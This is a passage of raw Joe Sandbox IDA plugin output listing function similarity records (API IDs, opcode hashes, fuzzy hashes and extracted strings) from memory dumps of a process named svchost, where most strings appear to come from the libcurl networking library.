                          • Opcode ID: b35b362c05aff2789765e56d10a2213f184adf2532e6cfc79855a153cf41f60a
                          • Instruction ID: a786c50f3ff5169b5c915e3786bafc1502d55f44478cf58551c9edefacb590f6
                          • Opcode Fuzzy Hash: b35b362c05aff2789765e56d10a2213f184adf2532e6cfc79855a153cf41f60a
                          • Instruction Fuzzy Hash: 12317C6A70AB55C2EA61CF56D46026963B0FF0AFC0B485435DF4D43B46EF38E465C304
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: callocfree
                          • String ID:
                          • API String ID: 306872129-0
                          • Opcode ID: b72aaa71d823b0aa299c20d7c41a48865cc6457bf972838e1c8063c93baaf237
                          • Instruction ID: 4410e58222e193b23be451d2820b83b3e56e7675e2d6b892a750211a6e9dc0d3
                          • Opcode Fuzzy Hash: b72aaa71d823b0aa299c20d7c41a48865cc6457bf972838e1c8063c93baaf237
                          • Instruction Fuzzy Hash: 4021F969B0E78641E6125F26A82437B6751BB86FD4F480431EE8D47753DF7CD2428304
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$calloc
                          • String ID:
                          • API String ID: 3095843317-0
                          • Opcode ID: 69fa5bebc68dcac98da7414f88ed7e2519d7086ffb7c23b33bd23f0b43c82365
                          • Instruction ID: d73a652e4d7743636bf870ac6b356d01cb54b979000b2ab4beece4805d82c852
                          • Opcode Fuzzy Hash: 69fa5bebc68dcac98da7414f88ed7e2519d7086ffb7c23b33bd23f0b43c82365
                          • Instruction Fuzzy Hash: C021E136B0AB4A81E7129F12A8503A967A2FB85FE0F084435EE4C47B52EF7CD4418304
                          APIs
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDA3776861
                            • Part of subcall function 00007FFDA377A920: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA377A942
                            • Part of subcall function 00007FFDA377A920: strtol.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FFDA377A956
                            • Part of subcall function 00007FFDA377A920: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA377A965
                            • Part of subcall function 00007FFDA377A920: isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA377A983
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: _errno$_time64isspacestrtol
                          • String ID: connect_timeout
                          • API String ID: 1465606051-1301815820
                          • Opcode ID: f9e2b2dd4110b161da813af918f7151e10ea1b4db753d8a941a0c659d0753ac6
                          • Instruction ID: 8bff285f11271bd3f950ba244e2ec189bfab80e4af65f46cf53422758d20773c
                          • Opcode Fuzzy Hash: f9e2b2dd4110b161da813af918f7151e10ea1b4db753d8a941a0c659d0753ac6
                          • Instruction Fuzzy Hash: 55310732F0A1418AF7E48E2590205B976A2EF45B64F180235DE6D273CBCFBAE8419744
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: O_free
                          • String ID:
                          • API String ID: 2581946324-0
                          • Opcode ID: e553ec5b8b0fed837ad59d7719962a035d2a56f82eaa6423f3b5d4b51490fcf7
                          • Instruction ID: 6dbab1257e2afc9ca43deba98e1e095b2b3291a48d7618120e9882c6e2208e41
                          • Opcode Fuzzy Hash: e553ec5b8b0fed837ad59d7719962a035d2a56f82eaa6423f3b5d4b51490fcf7
                          • Instruction Fuzzy Hash: EE711133609B8086D750DF25E89025EB7E9F784B88F244939EE8D57B19CF39C4A1CB58
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: O_free
                          • String ID:
                          • API String ID: 2581946324-0
                          • Opcode ID: c3d226b7a5d4f18efd56db8e6d4485786acd9de6cc0e4b5505d7d8d09eaf298c
                          • Instruction ID: 08d13b0d6caa96038ee17495821ad076c05bce36dc3db1cbc74315f716ce485b
                          • Opcode Fuzzy Hash: c3d226b7a5d4f18efd56db8e6d4485786acd9de6cc0e4b5505d7d8d09eaf298c
                          • Instruction Fuzzy Hash: DC511033608B8086D750DF25E89025AB7E9F784F88F244929EECD57B19CF39C4A1DB58
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: M_growmemcpy
                          • String ID:
                          • API String ID: 2478243595-0
                          • Opcode ID: 59ccbb3bb9be0ec2aee071d67a8046625b0f8bf0954fe4b6591bb4951fe69e8f
                          • Instruction ID: 93dbd864b37342a7431e1699cfaddb7ca857db0293fe699dae5986ad8be7be61
                          • Opcode Fuzzy Hash: 59ccbb3bb9be0ec2aee071d67a8046625b0f8bf0954fe4b6591bb4951fe69e8f
                          • Instruction Fuzzy Hash: 8C518132B09FC681DB54EF16E4503A87361FB48B98F088532EE8D977A9DF7AD4818314
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FFD942D944E,?,?,?,00007FFD942D970A), ref: 00007FFD942E5686
                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FFD942E56E9
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          • Associated: 00000035.00000002.3362523626.00007FFD94240000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362698877.00007FFD9445A000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362719340.00007FFD9445D000.00000008.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362740573.00007FFD9445E000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362762637.00007FFD94462000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: FeaturePresentProcessor_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 1808705829-0
                          • Opcode ID: 1b2f749e313dfc5569fe0a61edaeb746f72f4ec4fd78a807df2ebfd42354c913
                          • Instruction ID: d57def42302f5e85433eb1ae723f5a12fe9445a7e5ff8ce356864dc1bf9f9a1a
                          • Opcode Fuzzy Hash: 1b2f749e313dfc5569fe0a61edaeb746f72f4ec4fd78a807df2ebfd42354c913
                          • Instruction Fuzzy Hash: 72317021B2D642C2FA78AFD194A12BB6290BF87784F54C434EA4D17AD7DE3EE840C711
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: O_free
                          • String ID:
                          • API String ID: 2581946324-0
                          • Opcode ID: 0ec6a5da9dd24791ccbb90d3d7413c2695686832c15197f3a623ed94e41998b7
                          • Instruction ID: 6481212873616efe27520b439c68a31c81724c8e17325ef95203dd8f33b4e316
                          • Opcode Fuzzy Hash: 0ec6a5da9dd24791ccbb90d3d7413c2695686832c15197f3a623ed94e41998b7
                          • Instruction Fuzzy Hash: 0431FD33619BA085EB40EF35E45026C73AAFB84F88F145136EA4D97B5ACF35D892C354
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          • Associated: 00000035.00000002.3362523626.00007FFD94240000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362698877.00007FFD9445A000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362719340.00007FFD9445D000.00000008.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362740573.00007FFD9445E000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362762637.00007FFD94462000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: ChangeCloseErrorFindLastNotification
                          • String ID:
                          • API String ID: 1687624791-0
                          • Opcode ID: 5415232223c49cab955febe67e80327f788ad51cb6d2aa244ca356c60ab58e46
                          • Instruction ID: e252064ed6d766ba8c360120988dd9578cf7823976567fc3142a75e3d53bf553
                          • Opcode Fuzzy Hash: 5415232223c49cab955febe67e80327f788ad51cb6d2aa244ca356c60ab58e46
                          • Instruction Fuzzy Hash: D8218011B2874341EA7097E594E027E1291BF867E4F548335EA2E473C7DE6DE445C300
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          • Associated: 00000035.00000002.3362523626.00007FFD94240000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362698877.00007FFD9445A000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362719340.00007FFD9445D000.00000008.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362740573.00007FFD9445E000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362762637.00007FFD94462000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: ErrorFileLastPointer
                          • String ID:
                          • API String ID: 2976181284-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: closesocketsocket
                          • String ID:
                          • API String ID: 2760038618-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: Concurrency::cancel_current_task
                          • String ID:
                          • API String ID: 118556049-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: ExclusiveLock$AcquireRelease
                          • String ID:
                          • API String ID: 17069307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLast
                          • String ID:
                          • API String ID: 1452528299-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: socket
                          • String ID:
                          • API String ID: 98920635-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          APIs
                          • RtlAllocateHeap.NTDLL(?,?,?,00007FFD942EED8D,?,?,00000000,00007FFD942F19AF,?,?,?,00007FFD942E673F,?,?,?,00007FFD942E6635), ref: 00007FFD942E6DDE
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: O_write_ex
                          • String ID:
                          • API String ID: 4065850298-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: fflushfree
                          • String ID:
                          • API String ID: 1635840800-0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLaststrchr$getsocknamememmovestrtoul$_errnobindhtonsinet_ntopinet_pton
                          • String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$PORT$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
                          • API String ID: 3321035314-3876000827
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$malloc
                          • String ID: SSPI: couldn't get auth info$WDigest$digest_sspi: MakeSignature failed, error 0x%08lx$realm$schannel: InitializeSecurityContext failed: %s
                          • API String ID: 2190258309-863418744
                          APIs
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C45F7
                          • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FFDA55C4C00
                            • Part of subcall function 00007FFDA55C5090: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C50A4
                            • Part of subcall function 00007FFDA55C5090: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C50BA
                            • Part of subcall function 00007FFDA55C5090: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C50CE
                            • Part of subcall function 00007FFDA55C5090: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C50E2
                            • Part of subcall function 00007FFDA55C5090: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C50F6
                            • Part of subcall function 00007FFDA55C5090: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C510A
                            • Part of subcall function 00007FFDA55C5090: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C511E
                            • Part of subcall function 00007FFDA55C5090: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C5132
                            • Part of subcall function 00007FFDA55C55A0: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C55B7
                            • Part of subcall function 00007FFDA55C55A0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA55C55D1
                            • Part of subcall function 00007FFDA55C55A0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA55C55EC
                            • Part of subcall function 00007FFDA55C55A0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA55C5608
                            • Part of subcall function 00007FFDA55C55A0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA55C5624
                            • Part of subcall function 00007FFDA55C55A0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA55C5640
                            • Part of subcall function 00007FFDA55C55A0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA55C5658
                            • Part of subcall function 00007FFDA55C55A0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA55C5670
                            • Part of subcall function 00007FFDA55C55A0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA55C5688
                            • Part of subcall function 00007FFDA55C55A0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA55C56A0
                            • Part of subcall function 00007FFDA55C55A0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA55C56B8
                            • Part of subcall function 00007FFDA55C55A0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C56D2
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: _strdupfree$callocstrtoul
                          • String ID: (in redirect)$%s://%s$Protocol "%s" %s%s$Switched from HTTP to HTTPS due to HSTS => %s$Too long host name (maximum is %d)$URL rejected: %s$disabled$file$http$https$not supported
                          • API String ID: 3044576692-1310853161
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: CreateErrorEventLastcalloc
                          • String ID: Time-out$WSACloseEvent failed (%d)$WSACreateEvent failed (%d)$WSAEnumNetworkEvents failed (%d)
                          • API String ID: 853309704-1941740749
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: Event$Select$Eventsfree$EnumNetworkgetsockoptsend$ErrorLastMultipleResetWait
                          • String ID:
                          • API String ID: 2466694130-0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$_strdup$fclose
                          • String ID: default$login$macdef$machine$password
                          • API String ID: 800660972-1563471620
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: AddressCertHandleModuleNameProcString
                          • String ID: 2.5.29.17$schannel: CertFindExtension() returned no extension.$schannel: CryptDecodeObjectEx() returned no alternate name information.$schannel: Empty DNS name.$schannel: Not enough memory to list all host names.$schannel: Null certificate context.$schannel: Null certificate info.
                          • API String ID: 4138448956-2160583098
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyReleasememset
                          • String ID: @
                          • API String ID: 2041421932-2766056989
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: calloc$ErrorLastbind
                          • String ID: bind() failed; %s
                          • API String ID: 2604820300-1141498939
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: calloc$ErrorLastbind
                          • String ID: bind() failed; %s
                          • API String ID: 2604820300-1141498939
                          APIs
                          • RtlCaptureContext.KERNEL32 ref: 64947664
                          • RtlLookupFunctionEntry.KERNEL32 ref: 6494767B
                          • RtlVirtualUnwind.KERNEL32 ref: 649476BD
                          • SetUnhandledExceptionFilter.KERNEL32 ref: 64947704
                          • UnhandledExceptionFilter.KERNEL32 ref: 64947711
                          • GetCurrentProcess.KERNEL32 ref: 64947717
                          • TerminateProcess.KERNEL32 ref: 64947725
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtual
                          • String ID:
                          • API String ID: 3266983031-0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID: Resolving timed out after %lld milliseconds$operation aborted by pre-request callback
                          • API String ID: 1294909896-247252918
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: Crypt$Context$AcquireCreateHashRelease
                          • String ID: @
                          • API String ID: 4045725610-2766056989
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: Crypt$Hash$Param$ContextDestroyRelease
                          • String ID:
                          • API String ID: 2110207923-0
                          APIs
                          • GetSystemTimeAdjustment.KERNEL32 ref: 64946F72
